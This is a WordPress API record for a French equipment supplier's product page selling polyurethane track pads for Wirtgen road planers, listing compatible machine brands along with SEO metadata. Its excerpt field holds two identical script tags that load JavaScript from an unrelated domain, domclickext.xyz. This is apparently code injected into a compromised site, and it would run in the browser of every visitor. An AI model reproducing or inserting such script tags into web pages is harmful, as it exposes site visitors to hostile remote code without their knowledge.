{"id":3432,"date":"2023-12-23T18:38:27","date_gmt":"2023-12-23T17:38:27","guid":{"rendered":"https:\/\/laserelectronique.com\/?post_type=product&#038;p=3432"},"modified":"2023-12-23T18:38:54","modified_gmt":"2023-12-23T17:38:54","slug":"surpatins-raboteuses-300mm-2411112-wirtgen","status":"publish","type":"product","link":"https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen","title":{"rendered":"Surpatins raboteuses 300mm 2411112 Wirtgen"},"content":{"rendered":"<p><strong>Surpatin polyur\u00e9thane 300 mm \u00e9quivalent \u00e0 easy pad WIRTGEN 2102697 et 2411112<\/strong><\/p>\n<p><strong>Se monte sur w2000\u00a0 et w210<\/strong><\/p>\n<p><strong>et aussi pour raboteuses &amp; machine \u00e0 coffrage glissant :<\/strong><\/p>\n<ul>\n<li><strong>ABG &#8211; Volvo<\/strong><\/li>\n<li><strong>Bitelli &#8211; Caterpillar<\/strong><\/li>\n<li><strong>Bomag &#8211; Marini<\/strong><\/li>\n<li><strong>Demag &#8211; Dynapac<\/strong><\/li>\n<li><strong>Gomaco<\/strong><\/li>\n<li><strong>Miller<\/strong><\/li>\n<li><strong>Power Curbers<\/strong><\/li>\n<li><strong>Vog\u00eble &#8211; Wirtgen<\/strong><\/li>\n<li><strong>et autres.<\/strong><\/li>\n<\/ul>\n<p><strong>Illustration:\u00a0<\/strong><\/p>\n<p><strong>avec goujons soud\u00e9s, <\/strong><strong>\u00e9crous fournis<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>Document produit:<\/h3>\n<ul>\n<li><a href=\"http:\/\/laserins.fr\/wp-content\/uploads\/2017\/03\/DOC-RABOTEUSES.pdf\">Fiche Produits Raboteuses<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp;<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"featured_media":3431,"comment_status":"open","ping_status":"closed","template":"","meta":[],"product_cat":[9,78,15],"product_tag":[63,61,62],"class_list":{"0":"post-3432","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-patins-caoutchouc-polyurethane","7":"product_cat-promotions","8":"product_cat-raboteuses","9":"product_tag-chenille-finisseur","10":"product_tag-patin-pour-finisseur","11":"product_tag-patin-finisseur","12":"","14":"first","15":"instock","16":"taxable","17":"shipping-taxable","18":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Surpatins raboteuses 300mm 2411112 Wirtgen - LASER ELECTRONIQUE TP<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Surpatins raboteuses 300mm 2411112 Wirtgen - LASER ELECTRONIQUE TP\" \/>\n<meta property=\"og:description\" content=\"&nbsp;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen\" \/>\n<meta property=\"og:site_name\" content=\"LASER ELECTRONIQUE TP\" \/>\n<meta property=\"article:modified_time\" content=\"2023-12-23T17:38:54+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/laserelectronique.com\/wp-content\/uploads\/2023\/12\/2411112-2102697.png\" \/>\n\t<meta property=\"og:image:width\" content=\"800\" \/>\n\t<meta property=\"og:image:height\" content=\"800\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen\",\"url\":\"https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen\",\"name\":\"Surpatins raboteuses 300mm 2411112 Wirtgen - LASER ELECTRONIQUE TP\",\"isPartOf\":{\"@id\":\"https:\/\/laserelectronique.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen#primaryimage\"},\"image\":{\"@id\":\"https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen#primaryimage\"},\"thumbnailUrl\":\"https:\/\/laserelectronique.com\/wp-content\/uploads\/2023\/12\/2411112-2102697.png\",\"datePublished\":\"2023-12-23T17:38:27+00:00\",\"dateModified\":\"2023-12-23T17:38:54+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen#primaryimage\",\"url\":\"https:\/\/laserelectronique.com\/wp-content\/uploads\/2023\/12\/2411112-2102697.png\",\"contentUrl\":\"https:\/\/laserelectronique.com\/wp-content\/uploads\/2023\/12\/2411112-2102697.png\",\"width\":800,\"height\":800},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/laserelectronique.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Boutique\",\"item\":\"https:\/\/laserelectronique.com\/?page_id=7\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Surpatins raboteuses 300mm 2411112 Wirtgen\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/laserelectronique.com\/#website\",\"url\":\"https:\/\/laserelectronique.com\/\",\"name\":\"LASER ELECTRONIQUE TP\",\"description\":\"VOTRE PARTENAIRE EN GUIDAGE D&#039;ENGINS, TOPOGRAPHIE ET SERVICES\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/laserelectronique.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Surpatins raboteuses 300mm 2411112 Wirtgen - LASER ELECTRONIQUE TP","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen","og_locale":"fr_FR","og_type":"article","og_title":"Surpatins raboteuses 300mm 2411112 Wirtgen - LASER ELECTRONIQUE TP","og_description":"&nbsp;","og_url":"https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen","og_site_name":"LASER ELECTRONIQUE TP","article_modified_time":"2023-12-23T17:38:54+00:00","og_image":[{"width":800,"height":800,"url":"https:\/\/laserelectronique.com\/wp-content\/uploads\/2023\/12\/2411112-2102697.png","type":"image\/png"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen","url":"https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen","name":"Surpatins raboteuses 300mm 2411112 Wirtgen - LASER ELECTRONIQUE TP","isPartOf":{"@id":"https:\/\/laserelectronique.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen#primaryimage"},"image":{"@id":"https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen#primaryimage"},"thumbnailUrl":"https:\/\/laserelectronique.com\/wp-content\/uploads\/2023\/12\/2411112-2102697.png","datePublished":"2023-12-23T17:38:27+00:00","dateModified":"2023-12-23T17:38:54+00:00","breadcrumb":{"@id":"https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen#primaryimage","url":"https:\/\/laserelectronique.com\/wp-content\/uploads\/2023\/12\/2411112-2102697.png","contentUrl":"https:\/\/laserelectronique.com\/wp-content\/uploads\/2023\/12\/2411112-2102697.png","width":800,"height":800},{"@type":"BreadcrumbList","@id":"https:\/\/laserelectronique.com\/?product=surpatins-raboteuses-300mm-2411112-wirtgen#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/laserelectronique.com\/"},{"@type":"ListItem","position":2,"name":"Boutique","item":"https:\/\/laserelectronique.com\/?page_id=7"},{"@type":"ListItem","position":3,"name":"Surpatins raboteuses 300mm 2411112 Wirtgen"}]},{"@type":"WebSite","@id":"https:\/\/laserelectronique.com\/#website","url":"https:\/\/laserelectronique.com\/","name":"LASER ELECTRONIQUE TP","description":"VOTRE PARTENAIRE EN GUIDAGE D&#039;ENGINS, TOPOGRAPHIE ET SERVICES","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/laserelectronique.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/laserelectronique.com\/index.php?rest_route=\/wp\/v2\/product\/3432","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/laserelectronique.com\/index.php?rest_route=\/wp\/v2\/product"}],"about":[{"href":"https:\/\/laserelectronique.com\/index.php?rest_route=\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/laserelectronique.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3432"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/laserelectronique.com\/index.php?rest_route=\/wp\/v2\/media\/3431"}],"wp:attachment":[{"href":"https:\/\/laserelectronique.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3432"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/laserelectronique.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_cat&post=3432"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/laserelectronique.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_tag&post=3432"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}